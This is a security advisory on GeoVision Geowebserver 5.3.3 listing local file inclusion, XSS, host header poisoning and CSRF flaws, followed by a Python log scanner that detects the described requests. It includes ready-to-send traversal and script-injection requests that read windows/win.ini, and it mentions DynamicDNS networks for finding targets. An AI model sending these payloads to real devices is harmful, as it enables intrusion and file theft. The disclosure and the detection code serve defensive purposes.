GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution

2021.08.17
Credit: Ken Pyle
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
# Date: 6-16-21 (Vendor Notified)
# Exploit Author: Ken 's1ngular1ty' Pyle
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
# Version: <= 5.3.3
# Tested on: Windows 20XX / MULTIPLE
# CVE : https://www.geovision.com.tw/cyber_security.php

GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors.

The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client-side exploitation, including session theft:

ex. obj_name=INJECTEDHTML / XSS

The application fails to properly enforce permissions and sanitize user requests. This allows for LFI / Remote Code Execution through several vectors:

ex. /Visitor//%252e(path to target)

These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API.

Nested exploitation of the LFI, XSS, HTML / Browser Injection:

GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1

Absolute exploitation of the LFI:

POST /Visitor/bin/WebStrings.srf?obj_name=win.ini

GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini

Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.

The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application.
These can be used for various vectors of attack. These attacks were disclosed as part of the IOTVillage Presentation: https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4
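A defender-side check for the request shapes described above, added here as an example and not part of the advisory: it decodes each access-log request target repeatedly (so the double-encoded /Visitor//%252e... form and the single-encoded ..%2f form both normalize to "../"), folds backslashes, and tags traversal, injected markup, double encoding and system-file references. The log lines, IP addresses and indicator names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the advisory), mirroring the
# request shapes the advisory describes plus one benign request for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Aug/2021:10:00:01 +0000] "GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script> HTTP/1.1" 200 512
10.0.0.6 - - [17/Aug/2021:10:00:02 +0000] "GET /Visitor//%252e%252e%252f%252e%252e%252fwindows\\win.ini HTTP/1.1" 200 2048
10.0.0.7 - - [17/Aug/2021:10:00:03 +0000] "GET /Visitor/bin/WebStrings.srf?file=strings.xml&obj_name=Title HTTP/1.1" 200 128
10.0.0.8 - - [17/Aug/2021:10:00:04 +0000] "POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1" 200 64
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r'(?<![\w.])\.\./')  # a bare "../" path segment
MARKUP_RE = re.compile(r'<\s*(script|iframe|img|svg)\b', re.IGNORECASE)

def decode_fully(target, max_rounds=3):
    """URL-decode until stable (bounded), fold '\\' to '/', return (decoded, rounds).
    %252e%252e%252f needs two rounds to become '../'; %2e%2e%2f needs one."""
    cur, rounds = target, 0
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    return cur.replace("\\", "/"), rounds

def classify(line):
    """Return the indicator names that fire for one log line (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    decoded, rounds = decode_fully(m.group("target"))
    hits = []
    if "/Visitor/" in decoded and TRAVERSAL_RE.search(decoded):
        hits.append("path-traversal")
    if MARKUP_RE.search(decoded):
        hits.append("html-injection")
    if rounds >= 2:  # only resolves on a second decode pass, as in /Visitor//%252e...
        hits.append("double-encoded")
    if "win.ini" in decoded.lower() or "/windows/" in decoded.lower():
        hits.append("system-file")
    return hits

def scan(log_text):
    """Return (request target, indicators) for every flagged line, in log order."""
    pairs = ((REQUEST_RE.search(l), classify(l)) for l in log_text.splitlines())
    return [(m.group("target"), hits) for m, hits in pairs if hits]
```

Matching on the decoded form rather than the raw target is what makes a single rule cover both the plain and the double-encoded traversal variants; the bounded decode loop keeps a hostile value from looping the scanner.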


Copyright 2021, cxsecurity.com